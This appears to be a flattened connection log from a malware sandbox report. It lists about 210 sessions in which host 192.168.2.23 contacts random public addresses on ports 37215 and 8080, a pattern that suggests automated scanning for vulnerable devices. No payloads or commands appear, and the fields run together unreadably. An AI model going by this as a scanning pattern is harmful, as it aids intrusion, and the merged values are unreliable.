                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31897192.168.2.2347908202.1.139.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31898192.168.2.2357884157.75.173.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31899192.168.2.2341606197.242.233.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31900192.168.2.2343132100.214.237.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31901192.168.2.2354278157.55.194.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31902192.168.2.235177441.120.109.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31903192.168.2.2346828197.238.1.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31904192.168.2.2343996157.190.89.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31905192.168.2.235110641.224.148.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31906192.168.2.2334156157.177.53.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31907192.168.2.235973441.66.124.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31908192.168.2.235538841.12.80.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31909192.168.2.233426841.13.218.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31910192.168.2.2357506157.71.78.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31911192.168.2.2349420157.58.211.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31912192.168.2.234097053.102.201.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31913192.168.2.234554041.86.217.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31914192.168.2.2360638197.21.114.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31915192.168.2.2340112197.162.176.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31916192.168.2.234950641.50.165.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31917192.168.2.2357218157.63.255.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31918192.168.2.235525241.166.75.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31919192.168.2.2353604197.30.158.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31920192.168.2.2349742197.74.85.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31921192.168.2.236021241.183.152.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31922192.168.2.2360356157.121.227.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31923192.168.2.2351664197.71.194.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31924192.168.2.235777424.147.239.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31925192.168.2.2347748180.254.200.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31926192.168.2.2353702197.60.129.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31927192.168.2.2360230157.183.45.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31928192.168.2.2342878157.198.23.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31929192.168.2.2339048157.183.222.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31930192.168.2.2335458146.108.108.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31931192.168.2.235027041.206.111.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31932192.168.2.234460641.111.214.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31933192.168.2.235925693.89.207.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31934192.168.2.2343382157.1.207.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31935192.168.2.233825441.150.61.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31936192.168.2.2351836157.35.50.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31937192.168.2.235356441.90.239.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31938192.168.2.2359432197.247.90.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31939192.168.2.235454073.144.106.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31940192.168.2.2349854135.228.111.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31941192.168.2.2357284167.109.146.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31942192.168.2.2359664142.210.89.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31943192.168.2.235765241.16.98.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31944192.168.2.233291235.188.153.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31945192.168.2.2352750197.195.126.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31946192.168.2.2346724157.86.213.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31947192.168.2.2353502139.233.0.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31948192.168.2.2342894157.224.107.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31949192.168.2.234555641.23.173.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31950192.168.2.2350536157.123.148.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31951192.168.2.233397284.86.82.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31952192.168.2.2335364197.131.205.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31953192.168.2.234143441.181.231.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31954192.168.2.2343258157.154.210.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31955192.168.2.235824841.254.222.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31956192.168.2.234092641.104.30.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31957192.168.2.2335358186.156.143.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31958192.168.2.2337100197.158.214.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31959192.168.2.233748641.222.245.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31960192.168.2.234116634.11.21.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31961192.168.2.234517641.76.107.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31962192.168.2.2336186197.249.50.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31963192.168.2.2357862197.52.112.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31964192.168.2.236025841.82.51.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31965192.168.2.233813641.181.144.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31966192.168.2.233347483.47.50.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31967192.168.2.234574841.240.30.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31968192.168.2.2343182157.225.161.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31969192.168.2.2339854157.110.228.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31970192.168.2.2339396157.5.1.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31971192.168.2.2360224198.17.24.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31972192.168.2.2349296146.23.85.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31973192.168.2.235582041.217.38.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31974192.168.2.2350950157.212.114.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31975192.168.2.2352512188.135.235.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31976192.168.2.234080481.88.248.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31977192.168.2.2336812157.98.158.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31978192.168.2.235847041.55.33.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31979192.168.2.233594827.15.41.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31980192.168.2.2354032157.187.4.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31981192.168.2.234926064.85.197.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31982192.168.2.233658041.142.253.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31983192.168.2.235871441.161.241.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31984192.168.2.2350164157.74.51.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31985192.168.2.2346986117.251.244.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31986192.168.2.2357704197.183.244.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31987192.168.2.235822493.23.83.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31988192.168.2.235564841.95.168.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31989192.168.2.2338172167.30.102.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31990192.168.2.2355004154.126.237.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31991192.168.2.23336584.194.229.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31992192.168.2.2351532164.141.42.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31993192.168.2.2349488206.66.146.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31994192.168.2.2341566189.196.106.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31995192.168.2.2336362148.251.69.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31996192.168.2.234701081.15.247.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31997192.168.2.234634820.179.206.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31998192.168.2.2356560108.109.45.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31999192.168.2.2350386153.164.183.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32000192.168.2.2353086170.115.5.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32001192.168.2.2346428150.103.84.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32002192.168.2.2358644121.249.170.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32003192.168.2.2349524130.10.210.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32004192.168.2.2341446153.184.185.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32005192.168.2.233447636.156.168.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32006192.168.2.2357220145.226.132.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32007192.168.2.234695453.67.104.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32008192.168.2.2349916116.127.58.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32009192.168.2.2353510187.204.143.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32010192.168.2.2342094123.87.102.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32011192.168.2.235992451.247.176.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32012192.168.2.2360188150.140.5.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32013192.168.2.233822462.104.242.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32014192.168.2.2343584206.69.140.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32015192.168.2.2345986220.92.57.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32016192.168.2.236002249.245.163.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32017192.168.2.234026012.174.97.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32018192.168.2.235314832.125.159.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32019192.168.2.2356196101.100.30.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32020192.168.2.2344786183.205.210.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32021192.168.2.233328279.57.114.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32022192.168.2.2343210177.216.133.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32023192.168.2.235145473.70.226.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32024192.168.2.2335416184.130.218.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32025192.168.2.235463082.137.159.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32026192.168.2.234444685.192.173.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32027192.168.2.235503835.121.24.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32028192.168.2.2338438142.215.224.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32029192.168.2.234865897.72.170.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32030192.168.2.235281623.31.233.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32031192.168.2.2339682166.88.75.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32032192.168.2.2353692112.73.182.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32033192.168.2.2347170123.7.157.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32034192.168.2.233937879.186.184.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32035192.168.2.236070277.125.105.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32036192.168.2.2332888172.210.170.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32037192.168.2.2359086105.220.181.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32038192.168.2.235226223.111.217.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32039192.168.2.2342986195.196.146.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32040192.168.2.2336936148.121.184.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32041192.168.2.235176699.38.206.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32042192.168.2.2338952106.10.25.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32043192.168.2.2351852209.148.118.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32044192.168.2.234813240.194.115.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32045192.168.2.2359920154.123.89.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32046192.168.2.233305298.135.1.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32047192.168.2.234319017.120.9.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32048192.168.2.2338392160.59.254.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32049192.168.2.235734036.186.181.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32050192.168.2.2352306135.20.111.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32051192.168.2.2345312153.98.147.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32052192.168.2.2347798124.141.147.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32053192.168.2.2353254149.85.166.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32054192.168.2.235573888.6.231.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32055192.168.2.2335894165.46.226.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32056192.168.2.235487462.241.167.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32057192.168.2.235942046.100.17.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32058192.168.2.2333680138.191.239.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32059192.168.2.233994482.24.43.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32060192.168.2.2355246121.76.227.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32061192.168.2.2339068180.219.239.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32062192.168.2.235912472.101.184.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32063192.168.2.2340086190.204.75.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32064192.168.2.2351588183.229.173.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32065192.168.2.235676241.185.2.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32066192.168.2.2340422137.252.112.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32067192.168.2.2355122109.165.105.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32068192.168.2.2347318166.76.18.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32069192.168.2.234422043.150.16.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32070192.168.2.2337792212.78.79.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32071192.168.2.23462384.243.206.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32072192.168.2.2349938189.243.83.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32073192.168.2.2341102180.210.128.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32074192.168.2.2346270103.204.86.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32075192.168.2.233278431.30.165.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32076192.168.2.2350790175.36.107.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32077192.168.2.235565866.46.132.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32078192.168.2.2336688126.173.52.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32079192.168.2.2339310110.91.183.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32080192.168.2.2337986154.15.177.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32081192.168.2.2346156142.126.142.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32082192.168.2.2339660198.112.109.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32083192.168.2.2349454112.195.130.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32084192.168.2.235355458.87.178.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32085192.168.2.235319452.119.145.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32086192.168.2.2354096195.161.102.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32087192.168.2.2344374156.15.246.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32088192.168.2.2359002132.93.140.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32089192.168.2.2359624171.135.167.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32090192.168.2.235706431.48.93.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32091192.168.2.235364648.17.102.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32092192.168.2.235076668.154.105.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32093192.168.2.234955824.54.42.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32094192.168.2.235722034.135.200.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32095192.168.2.2345262207.11.239.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32096192.168.2.2333466153.159.43.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32097192.168.2.235596696.179.74.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32098192.168.2.2353296179.178.215.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32099192.168.2.2334164108.43.253.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32100192.168.2.2334722128.14.169.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32101192.168.2.2357328220.19.3.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32102192.168.2.2356868141.205.32.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32103192.168.2.2339662149.88.147.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32104192.168.2.234435665.12.39.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32105192.168.2.2358042221.116.177.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32106192.168.2.2344298155.243.119.2518080
